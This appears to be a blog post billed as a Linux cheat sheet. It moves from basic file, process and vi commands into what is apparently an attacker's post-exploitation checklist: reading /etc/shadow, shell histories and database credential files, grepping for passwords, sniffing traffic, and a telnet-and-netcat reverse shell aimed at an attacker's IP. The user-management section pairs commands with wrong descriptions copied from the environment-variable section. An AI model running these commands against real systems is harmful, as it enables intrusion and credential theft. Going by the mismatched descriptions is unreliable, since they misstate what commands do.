Ultimate Linux Cheat sheet ๐Ÿš€๐Ÿš€

kiransethu46

Kiran Sethumadhavan

Posted on April 1, 2021

Ultimate Linux Cheat sheet ๐Ÿš€๐Ÿš€

*Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a
part of us *

Telegram = https://t.me/infosecbugbounty

ls [Lists all files and directories in the present
working directory]
ls-R [Lists files in sub-directories as well]
ls-a [Lists hidden files as well]
ls-al [Lists files and directories with detailed
information like permissions,size, owner, etc.]

cd or cd ~ [Navigate to HOME directory]
cd .. [Move one level up]
cd [To change to a particular directory]
cd / [Move to the root directory]

cat > filename [Creates a new file]
cat filename [Displays the file content]
cat file1 file2 > file3 [Joins two files (file1, file2)
and stores the output in a new
file (file3)]

mv file "new file path" [Moves the files to the new
location]
mv filename new_file_name [Renames the file to a new
filename]

sudo [Allows regular users to run programs with
the security privileges of the superuser
or root]
rm filename [Deletes a file]
man [Gives help information on a command
history Gives a list of all past commands
typed in the current terminal session]

clear [Clears the terminal]
mkdir directoryname [Creates a new directory in the
present working directory or a at the
specified path]
rmdir [Deletes a directory]
mv [Renames a directory]
pr -x [Divides the file into x columns]
pr -h [Assigns a header to the file]
pr -n [Denotes the file with Line Numbers]
lp -nc , lpr c [Prints "c" copies of the File]
lp-d lp-P [Specifies name of the printer]
apt-get [Command used to install and update
packages]

mail -s 'subject' -c 'cc-address' -b 'bcc-address' 'to-address' ( Command to send email)

mail -s "Subject" to-address < Filename (Command to send email with attachment)
File Permission commands

ls-l [to show file type and access permission]
r [read permission]
w [write permission]
x [execute permission]
-= [no permission]
Chown user [For changing the ownership of a
file/directory]

Chown user:group filename (change the user as well as group
for a file or directory)

Environment Variables command
echo $VARIABLE [To display value of a variable]
env [ Displays all environment variables]

VARIABLE_NAME= variable_value [Create a new variable]
Unset [Remove a variable]
export Variable=value [To set value of an
environment variable]
User management commands of linux

sudo adduser username [To display value of a variable]
sudo passwd -l 'username' [Displays all environment
variables]
sudo userdel -r 'username' [Create a new variable]
sudo usermod -a -G GROUPNAME USERNAME [Remove a variable]
sudo deluser USER GROUPNAME [To set value of an
environment variable]

Networking command

SSH username@ip-address or hostname [login into a remote
Linux machine using
SSH]
Ping hostname="" or ="" [To ping and Analyzing
network and host
connections]
dir [Display files in the current directory of a remote
computer]
cd "dirname" [change directory to "dirname" on a remote
computer]
put file [upload 'file' from local to remote computer]
get file [Download 'file' from remote to local computer]
quit [Logout]

Process command

bg [To send a process to the background]
fg [To run a stopped process in the foreground]
top [Details on all Active Processes]
ps [Give the status of processes running for a user]
ps PID [Gives the status of a particular process]
pidof [Gives the Process ID (PID) of a process]
kill PID [Kills a process]
nice [Starts a process with a given priority]
renice [Changes priority of an already running process]
df [Gives free hard disk space on your system]
free [Gives free RAM on your system]

VI Editing Commands

i [Insert at cursor (goes into insert mode)]
a [Write after cursor (goes into insert mode)]
A [Write at the end of line (goes into insert mode)]
ESC [Terminate insert mode]
u [Undo last change]
U [Undo all changes to the entire line]
o [Open a new line (goes into insert mode)]
dd [Delete line]
3dd [Delete 3 lines]
D [Delete contents of line after the cursor]
C [Delete contents of a line after the cursor and insert new text. Press ESC key to end insertion.]
dw [Delete word]
4dw [Delete 4 words]
cw [Change word]
x [Delete character at the cursor]
r [Replace character]
R [Overwrite characters from cursor onward
s [Substitute one character under cursor continue to
insert]
S [Substitute entire line and begin to insert at the
beginning of the line]
~ [Change case of individual character]

Operating System

What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.r./

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Search Files
grep pattern files
Search for pattern in files
grep -i Case insensยญitive search
grep -r Recursive search
grep -v Inverted search
grep -o Show matched part of file only
find /dir/ -name name* Find files starting with name in dir
find /dir/ -user name Find files owned by name in dir
find /dir/ -mmin num Find files modified less than num
minutes ago in dir
whereis command Find binary / source / manual for command
locate file
Find file (quick search of system index)

*Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a
part of us *

Telegram = https://t.me/infosecbugbounty

๐Ÿ’– ๐Ÿ’ช ๐Ÿ™… ๐Ÿšฉ
kiransethu46
Kiran Sethumadhavan

Posted on April 1, 2021

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related

ยฉ TheLazy.dev

About